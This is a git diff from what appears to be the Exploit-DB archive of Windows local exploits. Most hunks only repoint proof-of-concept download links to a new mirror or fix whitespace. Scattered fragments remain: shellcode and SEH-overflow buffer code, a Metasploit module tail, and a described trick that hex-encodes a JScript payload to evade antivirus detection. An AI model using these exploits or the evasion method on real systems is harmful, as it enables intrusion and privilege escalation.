@@ http://theori.io/research/cve-2016-0189 3. Browse with a victim IE to `vbscript_bypass_pm.html`. 4. (Re-fresh or re-open in case it doesn't work; It's not 100% reliable.) -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40118.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40118.zip \ No newline at end of file diff --git a/exploits/windows/local/40224.txt b/exploits/windows/local/40224.txt index c8f5989b2..05c100a7e 100644 --- a/exploits/windows/local/40224.txt +++ b/exploits/windows/local/40224.txt @@ -54,6 +54,6 @@ An attacker who successfully exploited the vulnerabilities could run arbitrary c ========== https://smsecurity.net/wp-content/uploads/2016/08/COSIG-2016-31.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40224.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40224.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/windows/local/40426.txt b/exploits/windows/local/40426.txt index 696315fcd..1dad4cbed 100644 --- a/exploits/windows/local/40426.txt +++ b/exploits/windows/local/40426.txt @@ -9,7 +9,7 @@ Full description: http://blog.rewolf.pl/blog/?p=1630 Exploit github repo: https://github.com/rwfpl/rewolf-msi-exploit EDB PoC Mirror: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40426.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40426.zip NTIOLib.sys is installed with a few different MSI utilities that are part of the software package for MSI motherboards and graphic cards. WinIO.sys is completely different driver and is installed with Dragon Gaming Center application, which is part of the software package for MSI notebooks. Since both drivers expose physical memory access to the unprivileged users, I decided to put it into one report (I’ll describe the technical differences later). Actually when I was verifying list of affected software, I’ve found third driver that is doing exactly the same thing, just have a bit different interface and name (RTCore32.sys / RTCore64.sys). diff --git a/exploits/windows/local/40655.txt b/exploits/windows/local/40655.txt index ce09e34cb..edae41ebf 100644 --- a/exploits/windows/local/40655.txt +++ b/exploits/windows/local/40655.txt @@ -11,4 +11,4 @@ A PoC is attached that causes a bsod when the kernel tries to write to 0x4141414 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40655.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40655.zip \ No newline at end of file diff --git a/exploits/windows/local/40660.txt b/exploits/windows/local/40660.txt index fa552e28d..e402372e0 100644 --- a/exploits/windows/local/40660.txt +++ b/exploits/windows/local/40660.txt @@ -75,4 +75,4 @@ the right UNC path) on the target machine. Proofs of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40660.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40660.zip \ No newline at end of file diff --git a/exploits/windows/local/40823.txt b/exploits/windows/local/40823.txt index 85f017cca..940d6aa27 100644 --- a/exploits/windows/local/40823.txt +++ b/exploits/windows/local/40823.txt @@ -1,5 +1,5 @@ Complete Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40823.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip Presentation: https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf diff --git a/exploits/windows/local/40848.java b/exploits/windows/local/40848.java index a95ce7b64..5dd4bfc33 100644 --- a/exploits/windows/local/40848.java +++ b/exploits/windows/local/40848.java @@ -154,4 +154,4 @@ public class WinPowerExploit { } } -// Compiled Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40848.class \ No newline at end of file +// Compiled Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40848.class \ No newline at end of file diff --git a/exploits/windows/local/41015.c b/exploits/windows/local/41015.c index e1483e909..66ad14946 100644 --- a/exploits/windows/local/41015.c +++ b/exploits/windows/local/41015.c @@ -2,7 +2,7 @@ Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41015.exe */ // ricklarabee.blogspot.com diff --git a/exploits/windows/local/41031.txt b/exploits/windows/local/41031.txt index aeb9242d6..4d21c411f 100644 --- a/exploits/windows/local/41031.txt +++ b/exploits/windows/local/41031.txt @@ -9,5 +9,4 @@ POC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41031.zip - +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41031.zip \ No newline at end of file diff --git a/exploits/windows/local/41144.txt b/exploits/windows/local/41144.txt index a418fcbf6..b96f6f98b 100644 --- a/exploits/windows/local/41144.txt +++ b/exploits/windows/local/41144.txt @@ -24,7 +24,7 @@ To exploit this issue: POC file that will open a java pop up when executed but any java payload will also work including the meterpreter payloads generated by metasploit. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41144.ppsx +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41144.ppsx Please note that in a fully patched version a pop up will show asking the user to run the file which is useful if you're good at social engineering ;) diff --git a/exploits/windows/local/41207.txt b/exploits/windows/local/41207.txt index 1f2d8b550..8da56808e 100644 --- a/exploits/windows/local/41207.txt +++ b/exploits/windows/local/41207.txt @@ -14,7 +14,7 @@ https://security.szurek.pl/viscosity-for-windows-167-privilege-escalation.html 2. Proof of Concept -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41207.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41207.zip 3. Solution diff --git a/exploits/windows/local/4178.txt b/exploits/windows/local/4178.txt index 41ef2db5b..9cafb0b59 100644 --- a/exploits/windows/local/4178.txt +++ b/exploits/windows/local/4178.txt @@ -3,6 +3,6 @@ Symantec AntiVirus symtdi.sys Local Privilege Escalation Author: Zohiartze Herce Site: http://48bits.com -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4178.rar (07122007-symTDI_advisory.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4178.rar (07122007-symTDI_advisory.rar) # milw0rm.com [2007-07-12] \ No newline at end of file diff --git a/exploits/windows/local/41902.txt b/exploits/windows/local/41902.txt index 06e3b43ea..947fccac4 100644 --- a/exploits/windows/local/41902.txt +++ b/exploits/windows/local/41902.txt @@ -37,4 +37,4 @@ The storage object is accessed and abused to escape the sandbox. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41902.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41902.zip \ No newline at end of file diff --git a/exploits/windows/local/41933.txt b/exploits/windows/local/41933.txt index d07c681dd..bbc02f0f0 100644 --- a/exploits/windows/local/41933.txt +++ b/exploits/windows/local/41933.txt @@ -28,4 +28,4 @@ An instance of notepad is running at system privileges. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41933.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41933.zip \ No newline at end of file diff --git a/exploits/windows/local/42077.txt b/exploits/windows/local/42077.txt index 081ddc478..66a64610b 100644 --- a/exploits/windows/local/42077.txt +++ b/exploits/windows/local/42077.txt @@ -82,4 +82,4 @@ Filename: apicall.c The password for all archives is "msmpeng" Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42077.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42077.zip \ No newline at end of file diff --git a/exploits/windows/local/42325.py b/exploits/windows/local/42325.py index 6beea03a1..4090ef7ea 100755 --- a/exploits/windows/local/42325.py +++ b/exploits/windows/local/42325.py @@ -2,7 +2,7 @@ # Counter Strike: Condition Zero BSP map exploit # By @Digital_Cold Jun 11, 2017 # -# E-DB Note: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42325.zip (bsp-exploit-source.zip) +# E-DB Note: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42325.zip (bsp-exploit-source.zip) # from binascii import hexlify, unhexlify from struct import pack, unpack diff --git a/exploits/windows/local/42385.py b/exploits/windows/local/42385.py index 9c3066a14..ba0e00ca0 100755 --- a/exploits/windows/local/42385.py +++ b/exploits/windows/local/42385.py @@ -48,4 +48,4 @@ try: file.close() raw_input("\nExploit has been created!\n") except: - print "There has been an Error" + print "There has been an Error" \ No newline at end of file diff --git a/exploits/windows/local/42425.txt b/exploits/windows/local/42425.txt index 381cfb357..f22773aec 100644 --- a/exploits/windows/local/42425.txt +++ b/exploits/windows/local/42425.txt @@ -70,4 +70,4 @@ DLL is loaded into the protected process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42425.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42425.zip \ No newline at end of file diff --git a/exploits/windows/local/42426.txt b/exploits/windows/local/42426.txt index 455762f0f..6237b8f75 100644 --- a/exploits/windows/local/42426.txt +++ b/exploits/windows/local/42426.txt @@ -52,4 +52,4 @@ DLL is loaded into the protected process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42426.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42426.zip \ No newline at end of file diff --git a/exploits/windows/local/42537.txt b/exploits/windows/local/42537.txt index 791a582b3..2e0e867ec 100644 --- a/exploits/windows/local/42537.txt +++ b/exploits/windows/local/42537.txt @@ -78,4 +78,4 @@ function New-PDFJS { } Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42537.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42537.zip \ No newline at end of file diff --git a/exploits/windows/local/42542.txt b/exploits/windows/local/42542.txt index f9165575c..f352e0cde 100644 --- a/exploits/windows/local/42542.txt +++ b/exploits/windows/local/42542.txt @@ -80,5 +80,4 @@ C:\WebCTRL6.0\WebCTRL Server.exe BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R - NT AUTHORITY\Authenticated Users:(ID)C - + NT AUTHORITY\Authenticated Users:(ID)C \ No newline at end of file diff --git a/exploits/windows/local/42565.py b/exploits/windows/local/42565.py index b212fecb9..3899827b1 100755 --- a/exploits/windows/local/42565.py +++ b/exploits/windows/local/42565.py @@ -58,4 +58,4 @@ shellcode = ("\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" padding = "\x44"*(1000-351) f = open ("exploit.txt", "w") f.write(buffer + nSEH + SEH + junk + shellcode + padding) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/local/42567.py b/exploits/windows/local/42567.py index 12998ca44..f25a5db1e 100755 --- a/exploits/windows/local/42567.py +++ b/exploits/windows/local/42567.py @@ -58,4 +58,4 @@ f = open ("calc.txt", "w") f.write(data) f.close() -#Greetz => Jack Carlo +#Greetz => Jack Carlo \ No newline at end of file diff --git a/exploits/windows/local/42568.py b/exploits/windows/local/42568.py index 6530b466f..aeb5bb874 100755 --- a/exploits/windows/local/42568.py +++ b/exploits/windows/local/42568.py @@ -59,4 +59,4 @@ f = open ("calc.txt", "w") f.write(data) f.close() -#Greetz => Jack Carlo +#Greetz => Jack Carlo \ No newline at end of file diff --git a/exploits/windows/local/42586.py b/exploits/windows/local/42586.py index 26265b082..b5e3f6b9b 100755 --- a/exploits/windows/local/42586.py +++ b/exploits/windows/local/42586.py @@ -55,5 +55,4 @@ data = buffer + nSEH + SEH + nops + buf f = open ("test.txt", "w") f.write(data) -f.close() - +f.close() \ No newline at end of file diff --git a/exploits/windows/local/42605.txt b/exploits/windows/local/42605.txt index 79671e577..0f1ec1d09 100644 --- a/exploits/windows/local/42605.txt +++ b/exploits/windows/local/42605.txt @@ -33,4 +33,4 @@ Also, NSD can be used to attach, kill processes or create memory dumps under the 3. Solution: -This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6. +This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6. \ No newline at end of file diff --git a/exploits/windows/local/42612.py b/exploits/windows/local/42612.py index 4e3bb6886..3077cd0b2 100755 --- a/exploits/windows/local/42612.py +++ b/exploits/windows/local/42612.py @@ -84,4 +84,4 @@ a = open("Dup_Scout_buffer.txt", "w") a.write(data) a.close() -#Greetz : @Pulkit +#Greetz : @Pulkit \ No newline at end of file diff --git a/exploits/windows/local/42718.rb b/exploits/windows/local/42718.rb index 3cc45aafc..cb29f0591 100755 --- a/exploits/windows/local/42718.rb +++ b/exploits/windows/local/42718.rb @@ -131,4 +131,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -__END__ +__END__ \ No newline at end of file diff --git a/exploits/windows/local/42735.c b/exploits/windows/local/42735.c index 78d382db9..160fe3b99 100644 --- a/exploits/windows/local/42735.c +++ b/exploits/windows/local/42735.c @@ -309,5 +309,4 @@ int main() exit(0); -} - +} \ No newline at end of file diff --git a/exploits/windows/local/42918.py b/exploits/windows/local/42918.py index 7a0d096db..917b7e651 100755 --- a/exploits/windows/local/42918.py +++ b/exploits/windows/local/42918.py @@ -65,4 +65,4 @@ f.close() #GREETZ ---------- #Taushif(Brother) -#----------------- +#----------------- \ No newline at end of file diff --git a/exploits/windows/local/42921.py b/exploits/windows/local/42921.py index f15da9ab0..bf6e117b8 100755 --- a/exploits/windows/local/42921.py +++ b/exploits/windows/local/42921.py @@ -61,4 +61,4 @@ file='\n // uac bypass via wsreset.exe // @404death -// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47755.zip +// EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47755.zip int main() diff --git a/exploits/windows/local/47831.txt b/exploits/windows/local/47831.txt index 112c758d2..b5fef1f33 100644 --- a/exploits/windows/local/47831.txt +++ b/exploits/windows/local/47831.txt @@ -63,5 +63,4 @@ Successfully processed 1 files; Failed processing 0 files [ Exploit -Privilege Escalation ] ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable -malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) - +malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) \ No newline at end of file diff --git a/exploits/windows/local/47933.rb b/exploits/windows/local/47933.rb index 14011eed6..190718970 100755 --- a/exploits/windows/local/47933.rb +++ b/exploits/windows/local/47933.rb @@ -1,4 +1,4 @@ -# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47933.zip +# EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47933.zip require 'openssl' diff --git a/exploits/windows/local/48071.md b/exploits/windows/local/48071.md index ece06f069..a5ffe53a2 100644 --- a/exploits/windows/local/48071.md +++ b/exploits/windows/local/48071.md @@ -24,4 +24,4 @@ This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA [Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE) -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48071.zip \ No newline at end of file +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48071.zip \ No newline at end of file diff --git a/exploits/windows/local/48267.txt b/exploits/windows/local/48267.txt index fa4b94c32..712e554c7 100644 --- a/exploits/windows/local/48267.txt +++ b/exploits/windows/local/48267.txt @@ -19,4 +19,4 @@ Windows SMBv3 LPE Exploit * https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/ -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip \ No newline at end of file +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48267.zip \ No newline at end of file diff --git a/exploits/windows/local/50653.txt b/exploits/windows/local/50653.txt index f4fc336e2..8744717a6 100644 --- a/exploits/windows/local/50653.txt +++ b/exploits/windows/local/50653.txt @@ -50,17 +50,17 @@ Lets begin... My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read. -00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 | -00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename -00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE -00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes -00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" -00007FFE7A4A7C92 | 85 C9 | test ecx,ecx +00007FFE7A4A7C83 | EB 0D                    | jmp ntdll.7FFE7A4A7C92                   | +00007FFE7A4A7C85 | FF C9                    | dec ecx                                  | ;This loops thru to read in the  path + filename +00007FFE7A4A7C87 | 66 45 39 5D 00           | cmp word ptr ds:[r13],r11w               | ;ACCESS VIOLATION HERE +00007FFE7A4A7C8C | 74 08                    | je ntdll.7FFE7A4A7C96                    | ;Move the string down two bytes +00007FFE7A4A7C8E | 49 83 C5 02              | add r13,2                                | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" +00007FFE7A4A7C92 | 85 C9                    | test ecx,ecx   -00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7 +00007FFE7A4A7C87 | 66 45 39 5D 00           | cmp word ptr ds:[r13],r11w               | ; BOOM ACCESS VIOLATION on Win10, but not Win7 ntdll!woutput_l+0x387: -00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=???? +00007ffe`7a4a7c87 6645395d00      cmp     word ptr [r13],r11w ds:000001ed`00000000=???? ======================================================================================================================================== Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day) @@ -126,7 +126,7 @@ Bypassing "Backdoor:JS/Relvelshe.A" detection. The way we do this is to Hex encode our PoC code new ActiveXObject("WScript.Shell").Run("calc.exe") Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function. -var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; +var hex  = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); @@ -172,12 +172,12 @@ rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write(); diff --git a/exploits/windows/local/5287.txt b/exploits/windows/local/5287.txt index ec550cc6c..d5f00cefc 100644 --- a/exploits/windows/local/5287.txt +++ b/exploits/windows/local/5287.txt @@ -1,5 +1,5 @@ Microsoft Office Excel Code Execution Exploit (MS08-014) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5287.rar (2008-zha0_ms08_014.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5287.rar (2008-zha0_ms08_014.rar) # milw0rm.com [2008-03-21] \ No newline at end of file diff --git a/exploits/windows/local/5320.txt b/exploits/windows/local/5320.txt index 14c51d7b5..3af9c6d46 100644 --- a/exploits/windows/local/5320.txt +++ b/exploits/windows/local/5320.txt @@ -2,7 +2,7 @@ Runs calc.exe on Office XP SP3 with updates < 03/11/08. Just for fun... -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5320.tgz (2008-ms08-016.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5320.tgz (2008-ms08-016.tgz) Marsupilamipowa@hotmail.fr diff --git a/exploits/windows/local/5442.cpp b/exploits/windows/local/5442.cpp index 39c57661a..46a1974cc 100644 --- a/exploits/windows/local/5442.cpp +++ b/exploits/windows/local/5442.cpp @@ -10,6 +10,6 @@ /// calc will not be run. ///////////////////////////////////////////////////////////// -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5442.zip (2008-exploit_08021.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5442.zip (2008-exploit_08021.zip) // milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/exploits/windows/local/5518.txt b/exploits/windows/local/5518.txt index 572cdf19c..eacbecad9 100644 --- a/exploits/windows/local/5518.txt +++ b/exploits/windows/local/5518.txt @@ -9,6 +9,6 @@ // Ruben Santamarta // www.reversemode.com -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5518.zip (2008-ms08-25-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5518.zip (2008-ms08-25-exploit.zip) # milw0rm.com [2008-04-28] \ No newline at end of file diff --git a/exploits/windows/local/6705.txt b/exploits/windows/local/6705.txt index 271218b24..116b95014 100644 --- a/exploits/windows/local/6705.txt +++ b/exploits/windows/local/6705.txt @@ -29,7 +29,7 @@ Response.Write(output); You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip -backup link: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6705.zip (2008-Churrasco.zip) +backup link: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip (2008-Churrasco.zip) Enjoy. diff --git a/exploits/windows/local/6757.txt b/exploits/windows/local/6757.txt index db343f98c..79bd5a5fe 100644 --- a/exploits/windows/local/6757.txt +++ b/exploits/windows/local/6757.txt @@ -4,7 +4,7 @@ I have just uploaded a k-plugin for Kartoffel, which exploits a flaw patched in the recent MS08-066 bulletin. http://kartoffel.reversemode.com/downloads.php -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6757.zip (2008-afd_plugin.zip) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6757.zip (2008-afd_plugin.zip) For those researchers interesting in digging a little bit more into this diff --git a/exploits/windows/local/6994.txt b/exploits/windows/local/6994.txt index dbf7cb5bf..7d31581da 100644 --- a/exploits/windows/local/6994.txt +++ b/exploits/windows/local/6994.txt @@ -1,6 +1,6 @@ Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Exploit author: Elazar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6994.pdf (2008-APSB08-19.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6994.pdf (2008-APSB08-19.pdf) # milw0rm.com [2008-11-05] \ No newline at end of file diff --git a/exploits/windows/local/7054.txt b/exploits/windows/local/7054.txt index db29d589b..6d729d6b2 100644 --- a/exploits/windows/local/7054.txt +++ b/exploits/windows/local/7054.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0802/AKEProtect_Exp.zip -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7054.zip (2008-AKEProtect_Exp.zip) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7054.zip (2008-AKEProtect_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0802/ntiadv0802.html diff --git a/exploits/windows/local/7516.txt b/exploits/windows/local/7516.txt index 8bd167c83..b2c849379 100644 --- a/exploits/windows/local/7516.txt +++ b/exploits/windows/local/7516.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0807/Epfw_Exp.zip -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7516.zip (2008-Epfw_Exp.zip) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7516.zip (2008-Epfw_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0807/ntiadv0807.html diff --git a/exploits/windows/local/7533.txt b/exploits/windows/local/7533.txt index f7889b9a8..a30d85f22 100644 --- a/exploits/windows/local/7533.txt +++ b/exploits/windows/local/7533.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0810/PowerStrip_Exp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7533.zip (2008-PowerStrip_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7533.zip (2008-PowerStrip_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0810/ntiadv0810.html diff --git a/exploits/windows/local/8175.txt b/exploits/windows/local/8175.txt index acd87c55e..09218dcca 100644 --- a/exploits/windows/local/8175.txt +++ b/exploits/windows/local/8175.txt @@ -30,7 +30,7 @@ Exploit: http://ntinternals.org/ntiadv0809/MksMonEn_Exp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8175.zip (2009-MksMonEn_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8175.zip (2009-MksMonEn_Exp.zip) Advisory: diff --git a/exploits/windows/local/8250.txt b/exploits/windows/local/8250.txt index 0cf36f10d..153e39b62 100644 --- a/exploits/windows/local/8250.txt +++ b/exploits/windows/local/8250.txt @@ -33,7 +33,7 @@ Exploit: http://ntinternals.org/ntiadv0812/ElbyCDIO_Exp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8250.zip (2009-ElbyCDIO_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8250.zip (2009-ElbyCDIO_Exp.zip) Advisory: http://ntinternals.org/ntiadv0812/ntiadv0812.html diff --git a/exploits/windows/local/8280.txt b/exploits/windows/local/8280.txt index c2be1dadf..1a54d7bf2 100644 --- a/exploits/windows/local/8280.txt +++ b/exploits/windows/local/8280.txt @@ -3,6 +3,6 @@ Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500 write up: http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html down: http://blacksecurity.org/download/66/Adobe_JBIG2_Universal_Reader_Acrobat_Exploit -back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8280.zip (2009-bl4ck-adobe.zip) +back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8280.zip (2009-bl4ck-adobe.zip) # milw0rm.com [2009-03-24] \ No newline at end of file diff --git a/exploits/windows/local/8322.txt b/exploits/windows/local/8322.txt index 773ca1efb..44175ee02 100644 --- a/exploits/windows/local/8322.txt +++ b/exploits/windows/local/8322.txt @@ -5,6 +5,6 @@ The vulnerability is caused due to the IOCTL handler of the "tmactmon.sys" driver improperly processing user space parameters. This exploit execute arbitrary code in kernel space via a specially crafted IOCTL. -untested: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8322.zip 2009-trendmicro_local_expl_0day.zip) +untested: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8322.zip 2009-trendmicro_local_expl_0day.zip) # milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/exploits/windows/local/8595.txt b/exploits/windows/local/8595.txt index dd6a45d7c..9f4e8c211 100644 --- a/exploits/windows/local/8595.txt +++ b/exploits/windows/local/8595.txt @@ -21,6 +21,6 @@ Exploit By : www.Abysssec.com note : this exploit is just for educational purpose so shellcode will execute calc if you want other shellcode change shellcode . Exploit Link : http://abysssec.com/Adobe.Collab.getIcon().pdf -Mirror Link : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf) +Mirror Link : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf) # milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/exploits/windows/local/8782.txt b/exploits/windows/local/8782.txt index ef44f2109..654e7589a 100644 --- a/exploits/windows/local/8782.txt +++ b/exploits/windows/local/8782.txt @@ -35,7 +35,7 @@ Exploit: http://ntinternals.org/ntiadv0814/PsDrv_Exp.zip Mirror: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8782.zip (2009-PsDrv_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8782.zip (2009-PsDrv_Exp.zip) Advisory: http://ntinternals.org/ntiadv0814/ntiadv0814.html diff --git a/exploits/windows/local/8875.txt b/exploits/windows/local/8875.txt index 0bc33977f..54c7240f2 100644 --- a/exploits/windows/local/8875.txt +++ b/exploits/windows/local/8875.txt @@ -31,7 +31,7 @@ Exploit: http://ntinternals.org/ntiadv0806/OAmon_Exp.zip 